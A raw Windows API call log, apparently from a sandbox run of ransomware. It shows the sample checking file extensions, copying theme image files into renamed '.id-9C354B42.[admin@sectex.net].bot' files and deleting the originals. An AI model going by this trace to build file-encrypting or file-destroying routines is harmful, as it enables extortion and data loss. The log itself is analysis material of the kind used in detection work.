	[0046.775] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RMNSQUE\\THMBNAIL.PNG") returned 76
	[0046.775] lstrlenW (lpString=".jpg") returned 4
	[0046.775] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1
	[0046.775] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RMNSQUE\\THMBNAIL.PNG") returned 76
	[0046.775] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RMNSQUE\\THMBNAIL.PNG") returned 76
	[0046.775] lstrlenW (lpString=".doc") returned 4
	[0046.775] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1
	[0046.775] lstrlenW (lpString=".docx") returned 5
	[0046.775] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1
	[0046.775] lstrlenW (lpString=".pdf") returned 4
	[0046.775] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1
	[0046.775] lstrlenW (lpString=".xls") returned 4
	[0046.775] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1
	[0046.775] lstrlenW (lpString=".xlsx") returned 5
	[0046.775] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1
	[0046.775] lstrlenW (lpString=".ppt") returned 4
	[0046.775] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1
	[0046.775] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RMNSQUE\\THMBNAIL.PNG") returned 76
	[0046.775] lstrlenW (lpString=".zip") returned 4
	[0046.775] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1
	[0046.775] lstrlenW (lpString=".rar") returned 4
	[0046.775] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1
	[0046.775] lstrlenW (lpString=".bz2") returned 4
	[0046.775] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1
	[0046.775] lstrlenW (lpString=".7z") returned 3
	[0046.775] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1
	[0046.775] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RMNSQUE\\THMBNAIL.PNG") returned 76
	[0046.775] lstrlenW (lpString=".dbf") returned 4
	[0046.775] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1
	[0046.775] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RMNSQUE\\THMBNAIL.PNG") returned 76
	[0046.775] lstrlenW (lpString=".1cd") returned 4
	[0046.775] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1
	[0046.776] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RMNSQUE\\THMBNAIL.PNG") returned 76
	[0046.776] lstrlenW (lpString=".jpg") returned 4
	[0046.776] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1
	[0046.776] lstrcmpiW (lpString1=".PNG", lpString2=".bot") returned 1
	[0046.776] lstrlenW (lpString="THMBNAIL.PNG") returned 12
	[0046.776] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SKY\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\sky\\thmbnail.png"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1fc
	[0046.824] GetFileSizeEx (in: hFile=0x1fc, lpFileSize=0xa41ff1c | out: lpFileSize=0xa41ff1c*=29305) returned 1
	[0046.824] CloseHandle (hObject=0x1fc) returned 1
	[0046.824] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SKY\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\sky\\thmbnail.png")) returned 0x20
	[0046.824] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SKY\\THMBNAIL.PNG.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\sky\\thmbnail.png.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0046.824] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SKY\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\sky\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1fc
	[0046.824] SetFilePointerEx (in: hFile=0x1fc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa41fec8 | out: lpNewFilePointer=0x0) returned 1
	[0046.824] SetFilePointerEx (in: hFile=0x1fc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa41fec8 | out: lpNewFilePointer=0x0) returned 1
	[0046.824] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SKY\\THMBNAIL.PNG.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\sky\\thmbnail.png.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x228
	[0046.824] GetLastError () returned 0x0
	[0046.824] ReadFile (in: hFile=0x1fc, lpBuffer=0xafa0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa41fed4, lpOverlapped=0x0 | out: lpBuffer=0xafa0020*, lpNumberOfBytesRead=0xa41fed4*=0x7279, lpOverlapped=0x0) returned 1
	[0046.828] WriteFile (in: hFile=0x228, lpBuffer=0xafa0020*, nNumberOfBytesToWrite=0x7280, lpNumberOfBytesWritten=0xa41fc9c, lpOverlapped=0x0 | out: lpBuffer=0xafa0020*, lpNumberOfBytesWritten=0xa41fc9c*=0x7280, lpOverlapped=0x0) returned 1
	[0046.829] ReadFile (in: hFile=0x1fc, lpBuffer=0xafa0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa41fed4, lpOverlapped=0x0 | out: lpBuffer=0xafa0020*, lpNumberOfBytesRead=0xa41fed4*=0x0, lpOverlapped=0x0) returned 1
	[0046.829] WriteFile (in: hFile=0x228, lpBuffer=0xafa0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa41fc9c, lpOverlapped=0x0 | out: lpBuffer=0xafa0020*, lpNumberOfBytesWritten=0xa41fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0046.829] SetEndOfFile (hFile=0x228) returned 1
	[0046.830] CloseHandle (hObject=0x228) returned 1
	[0046.830] SetFilePointerEx (in: hFile=0x1fc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa41fec8 | out: lpNewFilePointer=0x0) returned 1
	[0046.830] SetEndOfFile (hFile=0x1fc) returned 1
	[0046.831] CloseHandle (hObject=0x1fc) returned 1
	[0046.831] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SKY\\THMBNAIL.PNG.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0046.831] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SKY\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\sky\\thmbnail.png")) returned 1
	[0046.831] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SKY\\THMBNAIL.PNG") returned 72
	[0046.831] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SKY\\THMBNAIL.PNG") returned 72
	[0046.831] lstrlenW (lpString=".doc") returned 4
	[0046.831] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1
	[0046.831] lstrlenW (lpString=".docx") returned 5
	[0046.831] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1
	[0046.831] lstrlenW (lpString=".pdf") returned 4
	[0046.832] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1
	[0046.832] lstrlenW (lpString=".xls") returned 4
	[0046.832] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1
	[0046.832] lstrlenW (lpString=".xlsx") returned 5
	[0046.832] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1
	[0046.832] lstrlenW (lpString=".ppt") returned 4
	[0046.832] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1
	[0046.832] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SKY\\THMBNAIL.PNG") returned 72
	[0046.832] lstrlenW (lpString=".zip") returned 4
	[0046.832] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1
	[0046.832] lstrlenW (lpString=".rar") returned 4
	[0046.832] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1
	[0046.832] lstrlenW (lpString=".bz2") returned 4
	[0046.832] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1
	[0046.832] lstrlenW (lpString=".7z") returned 3
	[0046.832] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1
	[0046.832] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SKY\\THMBNAIL.PNG") returned 72
	[0046.832] lstrlenW (lpString=".dbf") returned 4
	[0046.832] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1
	[0046.832] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SKY\\THMBNAIL.PNG") returned 72
	[0046.832] lstrlenW (lpString=".1cd") returned 4
	[0046.832] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1
	[0046.832] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SKY\\THMBNAIL.PNG") returned 72
	[0046.832] lstrlenW (lpString=".jpg") returned 4
	[0046.832] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1
	[0046.832] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SKY\\THMBNAIL.PNG") returned 72
	[0046.832] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SKY\\THMBNAIL.PNG") returned 72
	[0046.832] lstrlenW (lpString=".doc") returned 4
	[0046.832] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1
	[0046.832] lstrlenW (lpString=".docx") returned 5
	[0046.832] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1
	[0046.832] lstrlenW (lpString=".pdf") returned 4
	[0046.832] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1
	[0046.832] lstrlenW (lpString=".xls") returned 4
	[0046.832] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1
	[0046.833] lstrlenW (lpString=".xlsx") returned 5
	[0046.833] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1
	[0046.833] lstrlenW (lpString=".ppt") returned 4
	[0046.833] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1
	[0046.833] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SKY\\THMBNAIL.PNG") returned 72
	[0046.833] lstrlenW (lpString=".zip") returned 4
	[0046.833] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1
	[0046.833] lstrlenW (lpString=".rar") returned 4
	[0046.833] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1
	[0046.833] lstrlenW (lpString=".bz2") returned 4
	[0046.833] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1
	[0046.833] lstrlenW (lpString=".7z") returned 3
	[0046.833] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1
	[0046.833] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SKY\\THMBNAIL.PNG") returned 72
	[0046.833] lstrlenW (lpString=".dbf") returned 4
	[0046.833] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1
	[0046.833] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SKY\\THMBNAIL.PNG") returned 72
	[0046.833] lstrlenW (lpString=".1cd") returned 4
	[0046.833] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1
	[0046.833] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SKY\\THMBNAIL.PNG") returned 72
	[0046.833] lstrlenW (lpString=".jpg") returned 4
	[0046.833] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1
	[0046.833] lstrcmpiW (lpString1=".GIF", lpString2=".bot") returned 1
	[0046.833] lstrlenW (lpString="PREVIEW.GIF") returned 11
	[0046.833] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SLATE\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\slate\\preview.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1fc
	[0046.835] GetFileSizeEx (in: hFile=0x1fc, lpFileSize=0xa41ff1c | out: lpFileSize=0xa41ff1c*=1009) returned 1
	[0046.835] CloseHandle (hObject=0x1fc) returned 1
	[0046.835] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SLATE\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\slate\\preview.gif")) returned 0x20
	[0046.835] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SLATE\\PREVIEW.GIF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\slate\\preview.gif.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0046.835] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SLATE\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\slate\\preview.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1fc
	[0046.835] SetFilePointerEx (in: hFile=0x1fc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa41fec8 | out: lpNewFilePointer=0x0) returned 1
	[0046.835] SetFilePointerEx (in: hFile=0x1fc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa41fec8 | out: lpNewFilePointer=0x0) returned 1
	[0046.835] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SLATE\\PREVIEW.GIF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\slate\\preview.gif.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x228
	[0046.837] GetLastError () returned 0x0
	[0046.837] ReadFile (in: hFile=0x1fc, lpBuffer=0xafa0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa41fed4, lpOverlapped=0x0 | out: lpBuffer=0xafa0020*, lpNumberOfBytesRead=0xa41fed4*=0x3f1, lpOverlapped=0x0) returned 1
	[0046.839] WriteFile (in: hFile=0x228, lpBuffer=0xafa0020*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0xa41fc9c, lpOverlapped=0x0 | out: lpBuffer=0xafa0020*, lpNumberOfBytesWritten=0xa41fc9c*=0x400, lpOverlapped=0x0) returned 1
	[0046.839] ReadFile (in: hFile=0x1fc, lpBuffer=0xafa0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa41fed4, lpOverlapped=0x0 | out: lpBuffer=0xafa0020*, lpNumberOfBytesRead=0xa41fed4*=0x0, lpOverlapped=0x0) returned 1
	[0046.839] WriteFile (in: hFile=0x228, lpBuffer=0xafa0020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0xa41fc9c, lpOverlapped=0x0 | out: lpBuffer=0xafa0020*, lpNumberOfBytesWritten=0xa41fc9c*=0xea, lpOverlapped=0x0) returned 1
	[0046.840] SetEndOfFile (hFile=0x228) returned 1
	[0046.840] CloseHandle (hObject=0x228) returned 1
	[0046.840] SetFilePointerEx (in: hFile=0x1fc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa41fec8 | out: lpNewFilePointer=0x0) returned 1
	[0046.840] SetEndOfFile (hFile=0x1fc) returned 1
	[0046.841] CloseHandle (hObject=0x1fc) returned 1
	[0046.841] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SLATE\\PREVIEW.GIF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0046.841] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SLATE\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\slate\\preview.gif")) returned 1
	[0046.841] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SLATE\\PREVIEW.GIF") returned 73
	[0046.841] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SLATE\\PREVIEW.GIF") returned 73
	[0046.841] lstrlenW (lpString=".doc") returned 4
	[0046.841] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1
	[0046.841] lstrlenW (lpString=".docx") returned 5
	[0046.841] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1
	[0046.841] lstrlenW (lpString=".pdf") returned 4
	[0046.841] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1
	[0046.841] lstrlenW (lpString=".xls") returned 4
	[0046.841] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1
	[0046.841] lstrlenW (lpString=".xlsx") returned 5
	[0046.841] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1
	[0046.841] lstrlenW (lpString=".ppt") returned 4
	[0046.841] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1
	[0046.841] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SLATE\\PREVIEW.GIF") returned 73
	[0046.841] lstrlenW (lpString=".zip") returned 4
	[0046.842] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1
	[0046.842] lstrlenW (lpString=".rar") returned 4
	[0046.842] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1
	[0046.842] lstrlenW (lpString=".bz2") returned 4
	[0046.842] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1
	[0046.842] lstrlenW (lpString=".7z") returned 3
	[0046.842] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1
	[0046.842] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SLATE\\PREVIEW.GIF") returned 73
	[0046.842] lstrlenW (lpString=".dbf") returned 4
	[0046.842] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1
	[0046.842] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SLATE\\PREVIEW.GIF") returned 73
	[0046.842] lstrlenW (lpString=".1cd") returned 4
	[0046.842] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1
	[0046.842] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SLATE\\PREVIEW.GIF") returned 73
	[0046.842] lstrlenW (lpString=".jpg") returned 4
	[0046.842] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1
	[0046.842] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SLATE\\PREVIEW.GIF") returned 73
	[0046.842] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SLATE\\PREVIEW.GIF") returned 73
	[0046.842] lstrlenW (lpString=".doc") returned 4
	[0046.842] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1
	[0046.842] lstrlenW (lpString=".docx") returned 5
	[0046.842] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1
	[0046.842] lstrlenW (lpString=".pdf") returned 4
	[0046.842] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1
	[0046.842] lstrlenW (lpString=".xls") returned 4
	[0046.842] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1
	[0046.842] lstrlenW (lpString=".xlsx") returned 5
	[0046.842] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1
	[0046.842] lstrlenW (lpString=".ppt") returned 4
	[0046.842] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1
	[0046.842] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SLATE\\PREVIEW.GIF") returned 73
	[0046.842] lstrlenW (lpString=".zip") returned 4
	[0046.842] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1
	[0046.842] lstrlenW (lpString=".rar") returned 4
	[0046.843] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1
	[0046.843] lstrlenW (lpString=".bz2") returned 4
	[0046.843] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1
	[0046.843] lstrlenW (lpString=".7z") returned 3
	[0046.843] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1
	[0046.843] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SLATE\\PREVIEW.GIF") returned 73
	[0046.843] lstrlenW (lpString=".dbf") returned 4
	[0046.843] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1
	[0046.843] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SLATE\\PREVIEW.GIF") returned 73
	[0046.843] lstrlenW (lpString=".1cd") returned 4
	[0046.843] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1
	[0046.843] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SLATE\\PREVIEW.GIF") returned 73
	[0046.843] lstrlenW (lpString=".jpg") returned 4
	[0046.843] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1
	[0046.843] lstrcmpiW (lpString1=".PNG", lpString2=".bot") returned 1
	[0046.843] lstrlenW (lpString="THMBNAIL.PNG") returned 12
	[0046.843] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SLATE\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\slate\\thmbnail.png"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1fc
	[0046.843] GetFileSizeEx (in: hFile=0x1fc, lpFileSize=0xa41ff1c | out: lpFileSize=0xa41ff1c*=27177) returned 1
	[0046.843] CloseHandle (hObject=0x1fc) returned 1
	[0046.843] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SLATE\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\slate\\thmbnail.png")) returned 0x20
	[0046.844] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SLATE\\THMBNAIL.PNG.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\slate\\thmbnail.png.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0046.844] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SLATE\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\slate\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1fc
	[0046.844] SetFilePointerEx (in: hFile=0x1fc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa41fec8 | out: lpNewFilePointer=0x0) returned 1
	[0046.844] SetFilePointerEx (in: hFile=0x1fc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa41fec8 | out: lpNewFilePointer=0x0) returned 1
	[0046.844] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SLATE\\THMBNAIL.PNG.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\slate\\thmbnail.png.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x228
	[0046.844] GetLastError () returned 0x0
	[0046.844] ReadFile (in: hFile=0x1fc, lpBuffer=0xafa0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa41fed4, lpOverlapped=0x0 | out: lpBuffer=0xafa0020*, lpNumberOfBytesRead=0xa41fed4*=0x6a29, lpOverlapped=0x0) returned 1
	[0046.846] WriteFile (in: hFile=0x228, lpBuffer=0xafa0020*, nNumberOfBytesToWrite=0x6a30, lpNumberOfBytesWritten=0xa41fc9c, lpOverlapped=0x0 | out: lpBuffer=0xafa0020*, lpNumberOfBytesWritten=0xa41fc9c*=0x6a30, lpOverlapped=0x0) returned 1
	[0046.847] ReadFile (in: hFile=0x1fc, lpBuffer=0xafa0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa41fed4, lpOverlapped=0x0 | out: lpBuffer=0xafa0020*, lpNumberOfBytesRead=0xa41fed4*=0x0, lpOverlapped=0x0) returned 1
	[0046.847] WriteFile (in: hFile=0x228, lpBuffer=0xafa0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa41fc9c, lpOverlapped=0x0 | out: lpBuffer=0xafa0020*, lpNumberOfBytesWritten=0xa41fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0046.847] SetEndOfFile (hFile=0x228) returned 1
	[0046.847] CloseHandle (hObject=0x228) returned 1
	[0046.848] SetFilePointerEx (in: hFile=0x1fc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa41fec8 | out: lpNewFilePointer=0x0) returned 1
	[0046.848] SetEndOfFile (hFile=0x1fc) returned 1
	[0046.848] CloseHandle (hObject=0x1fc) returned 1
	[0046.848] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SLATE\\THMBNAIL.PNG.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0046.849] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SLATE\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\slate\\thmbnail.png")) returned 1
	[0046.849] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SLATE\\THMBNAIL.PNG") returned 74
	[0046.849] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SLATE\\THMBNAIL.PNG") returned 74
	[0046.849] lstrlenW (lpString=".doc") returned 4
	[0046.849] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1
	[0046.849] lstrlenW (lpString=".docx") returned 5
	[0046.849] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1
	[0046.849] lstrlenW (lpString=".pdf") returned 4
	[0046.849] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1
	[0046.849] lstrlenW (lpString=".xls") returned 4
	[0046.849] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1
	[0046.849] lstrlenW (lpString=".xlsx") returned 5
	[0046.849] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1
	[0046.849] lstrlenW (lpString=".ppt") returned 4
	[0046.849] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1
	[0046.849] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SLATE\\THMBNAIL.PNG") returned 74
	[0046.849] lstrlenW (lpString=".zip") returned 4
	[0046.849] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1
	[0046.849] lstrlenW (lpString=".rar") returned 4
	[0046.849] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1
	[0046.849] lstrlenW (lpString=".bz2") returned 4
	[0046.849] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1
	[0046.849] lstrlenW (lpString=".7z") returned 3
	[0046.850] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1
	[0046.850] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SLATE\\THMBNAIL.PNG") returned 74
